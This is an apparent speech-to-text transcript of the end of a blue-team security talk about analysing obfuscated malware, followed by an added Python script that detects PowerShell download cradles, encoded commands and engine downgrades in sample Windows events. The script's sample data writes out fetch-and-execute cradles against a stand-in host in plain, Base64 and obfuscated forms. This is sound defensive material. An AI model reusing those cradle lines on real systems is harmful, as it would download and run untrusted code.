that's how you become the Mauer analyst special thanks yeah like I said just a shout out to Adam swan and you can follow those guys and Nate with Jennie follow them on Twitter they're big elk stack blue team er guys and analysts who do cool stuff well and help contribute to this talk and these are some of the blogs that I follow or Twitter feeds and I follow of people who are relevant to what I just talked about and who do a lot of good work on what I just talked about and I'll put the slides up at some point like as a PDF on my github page which we kind of saw it beginning and I just
weird out with a three and if you need to find me the easiest way to google for it is applesauce in the bucket that's my Apple security repository and it seems to be the one that pops up in Google any questions we have just a minute or something left questions yes [Music]
Yeah, so to speak to that point really quickly, two things. Okay, number one, yeah, there are sites you can go out to, websites that will obfuscate or deobfuscate stuff for you automatically. They don't always work, and more importantly, if you're doing this for reals, for stuff from your company, and this is stuff you've gotten, it's just a matter of basic OPSEC that you don't want to go out and just paste that into an online tool, and you don't know whoever's running that site or why they're running it and what they're doing. It's kind of like just saying, well, I can just take the samples and upload them all to VirusTotal, right? It's an OPSEC thing; it depends on why you're doing the analysis, and so on and so forth. And in terms of getting your hands dirty, I mean, so the people who did the training yesterday, we did a whole training, I had them start out by writing scripts rather than trying to deobfuscate real samples, and that would be my recommendation, right? So if you're not, you just said if you're not a coder, okay, I would start out by not trying to deobfuscate obfuscated samples that some malware author has written. I would start out by writing my own really simple downloader with two VMs, and having an Apache server with a text file on it, and writing my own VBS or JavaScript downloader that downloads a file and understanding that functionality, and then when you start to look at obfuscated stuff you'll recognize, even though it's quote-unquote obfuscated, you're going to recognize the basic structure of what's going on. Does that help answer your question? Yeah, sure, so that would be the right way to do it if you're using an automated tool, would be to make sure you had a local copy. Yep. Like I said, that may not always work though, right? Any other questions? Okay, thank you. [Applause]
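As an added example (not code from the talk, the speaker, or any project the talk names), here is a small Python triage script written from the defender's side of the PowerShell section above. It takes constructed 4688-style process-creation records and 4104-style script block records, peels off the cheap obfuscation layers the talk lists (the IEX alias, tick marks, string concatenation, the -f format operator, a Base64 -EncodedCommand), and flags the Invoke-Expression / New-Object Net.WebClient DownloadString cradle, mshta.exe spawning a script interpreter, and a -Version 2 engine downgrade that would sidestep script block logging. The event dictionaries and their field names are a simplified stand-in for the real event log schema, the hostnames use the reserved .invalid domain, and the Base64 sample is generated inside the script rather than taken from any real incident.

```python
# Added example: triage constructed Windows events for the PowerShell tradecraft the
# talk describes. Event field names are simplified stand-ins, not the real EVTX schema.
from __future__ import annotations

import base64
import re

# Aliases the talk mentions attackers leaning on; expanded so indicators match canonical names.
ALIASES = {"iex": "invoke-expression", "icm": "invoke-command"}
# Backtick is PowerShell's escape char; before an ordinary letter it is a no-op
# (Ne`w-Ob`ject still runs). Only real escapes such as `n or `t are kept.
_TICK_NOOP = re.compile(r"`(?![ntr0abfv`])")
# 'Down'+'loadString' style concatenation of two adjacent string literals.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (real PowerShell flag).
_ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# powershell.exe -Version 2 / -v 2.0: the engine downgrade that sidesteps 4104 logging.
_DOWNGRADE = re.compile(r"-v(?:ersion)?\s+2(?:\.0)?\b", re.I)

INDICATORS = {
    "download_cradle": re.compile(r"net\.webclient[\s\S]*?download(?:string|file)"),
    "invoke_expression": re.compile(r"invoke-expression"),
    "remote_invoke": re.compile(r"invoke-command[\s\S]*?-computername"),
    "format_string_build": re.compile(r"\{\d+\}[\s\S]*?-f\s"),
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def normalize_script(text: str) -> str:
    """Strip the cheap obfuscation layers so the indicator regexes see canonical text."""
    s = _TICK_NOOP.sub("", text)
    prev = None
    while prev != s:  # collapse chained 'a'+'b'+'c' until nothing changes
        prev = s
        s = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), s)
    s = s.lower()
    return re.sub(r"\b(iex|icm)\b", lambda m: ALIASES[m.group(1)], s)

def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script_block(text: str) -> list[str]:
    """Names of the indicators present in a (possibly obfuscated) script block."""
    norm = normalize_script(text)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]

def check_process_event(ev: dict) -> list[str]:
    """4688-style process creation: mshta parent, v2 downgrade, cradle on the command line."""
    parent = ev.get("parent", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = ev.get("cmdline", "")
    findings = []
    if parent == "mshta.exe" and image in INTERPRETERS:
        findings.append("mshta_spawned_interpreter")
    if image in {"powershell.exe", "pwsh.exe"} and _DOWNGRADE.search(cmdline):
        findings.append("powershell_downgrade_v2")
    findings.extend(f"cmdline:{f}" for f in score_script_block(cmdline))
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
        findings.extend(f"decoded:{f}" for f in score_script_block(decoded))
    return findings

def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings for 4688 and 4104 events; quiet events are omitted."""
    results = {}
    for i, ev in enumerate(events):
        found = check_process_event(ev) if ev["id"] == 4688 else (
            score_script_block(ev["script"]) if ev["id"] == 4104 else [])
        if found:
            results[i] = found
    return results

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/c.ps1')"
SAMPLE_EVENTS = [  # constructed samples; hostnames use the reserved .invalid TLD
    {"id": 4688, "parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -Version 2 -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""},
    {"id": 4104, "script": "&('I'+'EX') (Ne`w-Ob`ject ('Net.Web'+'Client')).('Down'+'loadString')"
                           "(('{1}{0}' -f 'ample.invalid/b.ps1','http://ex'))"},
    {"id": 4688, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"id": 4688, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc "
                + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"id": 4104, "script": "Invoke-Command -ComputerName SRV01,SRV02 -ScriptBlock { Get-Service }"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {idx} (id {SAMPLE_EVENTS[idx]['id']}): {', '.join(hits)}")
```

Running it prints one line per event that hit an indicator. The plain cradle on the command line, the Base64-encoded copy, and the tick-mark/concatenation/-f obfuscated copy in the script block all reduce to the same two indicator names, which is the speaker's point about recognizing the basic structure under the obfuscation. The Invoke-Command hit is context rather than a verdict, since administrators use it too; the mshta.exe parent and the v2 downgrade are the findings worth alerting on by themselves, and the downgrade is exactly what the talk says to look for when 4104 logging would otherwise be silent.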